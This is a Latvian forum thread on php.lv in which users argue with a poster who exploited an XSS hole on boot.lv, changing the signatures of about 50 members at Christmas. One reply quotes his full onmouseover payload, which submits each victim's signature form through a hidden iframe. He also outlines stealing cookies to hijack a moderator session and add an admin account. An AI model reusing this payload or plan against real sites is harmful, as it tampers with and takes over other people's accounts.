Jump to content
php.lv forumi

boot.lv drošības caurums


betons

Recommended Posts

Nozogot desu veikals zaudē desu.

Nozogot failu, tā īpasņieks zaudē failu.

Nokopējot failu, tā īpašnieks nezaudē failu.

 

Autortiesību pārkāpums ir failu kopēšana, kad īpāsnieks nezaudē failu, kas principiāli atšķiras no zagšanas, kad īpašnieks pazaudē nozagto objektu.

 

P.S. Labāk beidz slepkavot manus baltos pikseļus ekrānam ar savu melno tekstu. Par slekpavību draud krimināls. ;)

Taču neiegūst peļņu, ko iegūtu, ja šo failu godīgi nopirktu

Toties, linkā, ko iedevu, bija rakstīts : "Spied uz šī teksta, lai redzētu boot.lv drošības caurumu."

Bet pašā boot diskusijā bija minēts, ka dotajā linkā ir parādīts boot caurums.

Ja tevi tas biedē un tu nezini, ko tas nozīmē, nah tev iet iekšā linkā?

Neuztraucies, uz Opera's tavs krutais XSS tāpat neaizgāja, tā kā mani tas nekrata. Drošības caurumu tu varēji demonstrēt kaut vai parādot manu parakstu, nevis izmainot to.

Link to comment
Share on other sites

  • Replies 87
  • Created
  • Last Reply

Top Posters In This Topic

"Taču neiegūst peļņu, ko iegūtu, ja šo failu godīgi nopirktu"

Neiegūst ar kautkādu varbūtību, jo bieži ir tā, ka ja attiecīgo produktu nevarētu iegūt pārkāpjot autortiesības, tad to arī nepirktu.

 

Un uz IE arī nestrādāja tāpēc, ka necentos pielāgot browseriem.

Bez tam tas nebija kruts XSS. Kruts būtu tad, ja tiktu nokopēti visi kūkiji un nosūtīti uz manu serveri, tad atrastu modera sesijas datus, ierakstītu savā browsrerī un lietotu kā admins, ja tomēr sesija ir piesaistīta IP adresei, tad izpīldītu nevis paraksta nomaiņas funkcijas, bet jauna admina jūzera pievienošans funkciju.

Bet, tas kā es parādu drošības caurumu, tā ir mana izvēle, nevis tava.

Beztam tavu parakstu varu iegūt arī bez cauruma, ta kā tāds variants neder.

Link to comment
Share on other sites

"Taču neiegūst peļņu, ko iegūtu, ja šo failu godīgi nopirktu"

Neiegūst ar kautkādu varbūtību, jo bieži ir tā, ka ja attiecīgo produktu nevarētu iegūt pārkāpjot autortiesības, tad to arī nepirktu.

Da labi, veikalā arī varbūt to desu neviens nenopirktu un viņai beigtos derīguma termiņš, taču faktu, ka tā ir zagšana neviens neapstrīdētu.

 

Nu ok, varbūt ne kruts, taču skaists gan. Cepums par pacietību. Taču -cepums par pasniegšanas veidu.

 

P.S. Tas otrs variants būtu ne tikai kruts, bet arī sodāms.

Edited by fest
Link to comment
Share on other sites

Jūs te ar saviem krimināliem postiem esat saputrojuši gan sev, gan citiem saprātus.

Tēma un tās milzīgās diskusijas par autortiesībām ir pilīgi nevietā!!!

Esat tak saprātīgi un domājiet loģiski, nekādi dati netika dublēti, kopēti utt.

 

Te ir 100% runa pa privātīpašuma iznīcināšanu un patvaļīgu vandālismu!

Beton, tu fiziski iznīcināji un patvaļīgi vandalizēji ap 50 cilvēku parakstu, te nav runa par informāciju, virtuālo vidi, autortiesībām, ziemassvētku apsveikumiem, humoru, vai boot.lv drosības caurumiem!

 

Te ir runa par to, ka tu izmainīji 10*n tūkstošu metāla atomu izvietošanās secību boot.lv arhīva cieto disku masīvos.

Boot.lv iznomā mums par velti (neskaitot psiholoģisko...) ~ 1 nm2 vietas uz viņu cietajiem diskiem, kur mēs fiziski varam glabāt savu informāciju. Tu pārkāpi privātīpašuma tiesības - neatgriezeniski izdzēsi cilvēku parakstus, un to vietā ieliki citus.

 

Tagad iedomājies, Bubu savā paraksta vietnē glabāja sava bankas konda nummuru un pinkodu, tā bija vienīgā vieta, kur viņš glabāja šāda veida informāciju. Un tagad viņa bērni uz jauno gadu nevarēs saņemt dāvanas, jo tēvs "bubu" nevarēs izņemt naudu kamēr viņš nevūs nokārtojis formalitātes ar banku, un svētku laikā bankas neīpaši vēlas strādāt.

 

Labi, es te sarakstīju iespējams pilnīgas muļķības, ceru ka kāds būs pasmējies un jutīsies labi pēc tāda "nonsense" izlasīšanas.

 

Bet tā nopietni, paskaties uz savu kodu:

<b id="lol" onmouseover="function $(ob){return document.getElementById(ob);} $('lol').onmouseover='';$('top').innerHTML=''; self.timerlol=function(){ $('top').innerHTML+='Priecīgus ziemassvētkus '; setTimeout('timerlol();',100);}; timerlol(); aaa=0; o=document.createElement('iframe'); o.style.width='0px'; o.style.height='0px'; o.src='http://www.boot.lv/forums/index.php?act=UserCP&CODE=22'; document.getElementById('lol').appendChild(o); function onlol(){if (aaa==0) {o.contentDocument.getElementById('postcontent').innerHTML='[size=5]Priecīgus ziemassvētkus[/size] by Bērzs'; o.contentDocument.getElementById('postingform').submit(); aaa=1;}} o.onload=onlol;">Spied uz šī teksta, lai redzētu boot.lv drošības caurumu. Spied uz šī teksta, lai redzētu boot.lv drošības caurumu. Spied uz šī teksta, lai redzētu boot.lv drošības caurumu. Spied uz šī teksta, lai redzētu boot.lv drošības caurumu. Spied uz šī teksta, lai redzētu boot.lv drošības caurumu. Spied uz šī teksta, lai redzētu boot.lv drošības caurumu. Spied uz šī teksta, lai redzētu boot.lv drošības caurumu. Spied uz šī teksta, lai redzētu boot.lv drošības caurumu. Spied uz šī teksta, lai redzētu boot.lv drošības caurumu. </b>

 

Vai tev pašam nenāk smiekli apskatot šādu kodu???? Man gan nāk, un kādi vēl.

Nebrīnos, ka boot.lv administrācija uzskata tevi par "pokemonu", cik reizes tev vajadzēja atkārtot "Spied uz šī teksta, lai redzētu boot.lv drošības caurumu."

Neliekas pārāk bērnišķīgi atkārtot vienu un to pašu tekstu N reizes?

 

Es varbūt sākumā nebiju iedziļinājies šajā konfliktā, bet, pateicoties dažu "cietušo" liecībām, tagad man ir viss skaidrs.

Vārds "boot.lv drošības caurums" pats par sevi neko neizsaka. Kā cilvēki, kas nospieda to linku varēja zināt, ka tiks mainīta viņu privātā informācija?

Tad ar kādām tiesībām tu mainīji viņu privāt informāciju?

 

Būtu uzrakstījis normālu un sakarīgu topiku par šo tēmu, nebūtu muļķojis sākumā cilvēkus, tad tu vismaz būtu ieguvis savus slavas brīžus. Bet nē, tev vajadzēja uzvesties kā bērnam un sabojāt administrātoriem svētku dienu.

 

Vismaz nebūtu parakstus iznīcinājis...

Link to comment
Share on other sites

Jūs te ar saviem krimināliem postiem esat saputrojuši gan sev, gan citiem saprātus.

Tēma un tās milzīgās diskusijas par autortiesībām ir pilīgi nevietā!!!

Esat tak saprātīgi un domājiet loģiski, nekādi dati netika dublēti, kopēti utt.

Kā, un kā tad ar frāzi "Priecīgus ziemassvētkus by Bērzs"?

 

 

Te ir runa par to, ka tu izmainīji 10*n tūkstošu metāla atomu izvietošanās secību boot.lv arhīva cieto disku masīvos.

Boot.lv iznomā mums par velti (neskaitot psiholoģisko...) ~ 1 nm2 vietas uz viņu cietajiem diskiem, kur mēs fiziski varam glabāt savu informāciju. Tu pārkāpi privātīpašuma tiesības - neatgriezeniski izdzēsi cilvēku parakstus, un to vietā ieliki citus.

A tu padomā, kā tu ar savu gravitācijas lauku pavaļīgi mijiedarbojies ar mana suņa molekulām?

 

Tagad iedomājies, Bubu savā paraksta vietnē glabāja sava bankas konda nummuru un pinkodu, tā bija vienīgā vieta, kur viņš glabāja šāda veida informāciju. Un tagad viņa bērni uz jauno gadu nevarēs saņemt dāvanas, jo tēvs "bubu" nevarēs izņemt naudu kamēr viņš nevūs nokārtojis formalitātes ar banku, un svētku laikā bankas neīpaši vēlas strādāt.

Lai paņem no googles nokešotās versijas.

 

Vai tev pašam nenāk smiekli apskatot šādu kodu???? Man gan nāk, un kādi vēl.

Nebrīnos, ka boot.lv administrācija uzskata tevi par "pokemonu", cik reizes tev vajadzēja atkārtot "Spied uz šī teksta, lai redzētu boot.lv drošības caurumu."

Neliekas pārāk bērnišķīgi atkārtot vienu un to pašu tekstu N reizes?

teksts "boot.lv" boot.lv pirmajā lapā atkārtojas vismaz pāris desmitu reižu - cik pokemoniski!! :)

 

 

Es varbūt sākumā nebiju iedziļinājies šajā konfliktā, bet, pateicoties dažu "cietušo" liecībām, tagad man ir viss skaidrs.

Vārds "boot.lv drošības caurums" pats par sevi neko neizsaka. Kā cilvēki, kas nospieda to linku varēja zināt, ka tiks mainīta viņu privātā informācija?

Tad ar kādām tiesībām tu mainīji viņu privāt informāciju?

Es nē, es nē, to izdarīja katrs pats uzbīdot peli uz teksta un palaižot skriptu uz sava datora.

 

Būtu uzrakstījis normālu un sakarīgu topiku par šo tēmu, nebūtu muļķojis sākumā cilvēkus, tad tu vismaz būtu ieguvis savus slavas brīžus. Bet nē, tev vajadzēja uzvesties kā bērnam un sabojāt administrātoriem svētku dienu.

Īstenība malači, ātrāk kā stundas laikā izlaboja šo caurumu, bet jautājums paliek atklāts, kad tiks izlaboti vēl divi šādi caurumi.

 

 

Vismaz nebūtu parakstus iznīcinājis...

Es tas nebiju, katrs pats izmainīja savu parakstu, jo es to nemaz nevarēju izdarīt. To rēāli varēja izdarīt tikai katrs no sava datora vai arī administrātori.

Es lieku uz pirmo.

Link to comment
Share on other sites

Tu vēljoprojām uzvedies kā mazs bērns, tev vispār patsmit gadu ir? ha ha, noteikti ka ir, savādāk negvelztu visādas muļķības par autortiesību pārkāpumiem.

Kā, un kā tad ar frāzi "Priecīgus ziemassvētkus by Bērzs"?

Nu, tad kāds tur sakars ar autortiesību pārkāpumiem?

A tu padomā, kā tu ar savu gravitācijas lauku pavaļīgi mijiedarbojies ar mana suņa molekulām?

fizikā tev 2...

teksts "boot.lv" boot.lv pirmajā lapā atkārtojas vismaz pāris desmitu reižu - cik pokemoniski!! :)

Vot šitā tiešām ir pokemoniska atbilde. salīdzināji ar' ar savu linku :)

Es nē, es nē, to izdarīja katrs pats uzbīdot peli uz teksta un palaižot skriptu uz sava datora.

 

Es tas nebiju, katrs pats izmainīja savu parakstu, jo es to nemaz nevarēju izdarīt. To rēāli varēja izdarīt tikai katrs no sava datora vai arī administrātori.

Es lieku uz pirmo.

Tu izveidoji to skriptu(maz ticams, drīzāk kautkur netā nokopēj)i, tu iesūtīji postu ar linku, kurā ietverts šis skripts. Un visbeidzot, tu mudināji cilvēkus uzspiest uz šī linka, nemaz nebrīdinot viņus par sekām.

Edited by lupin
Link to comment
Share on other sites

Laikam bišķi sanāca aplauzties ar to, ka nāci domu biedrus meklēt un beigās visi nolika Tevi. Varbūt tas pierāda, ka tomēr Tev tiešām nebija taisnība un nav vērts vairs spirināties?

Ar katru brīdi tie komentāru paliek arvien bezjēdzīgāki no Tavas puses, priekš kam vēl ņemties?

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.

×
×
  • Create New...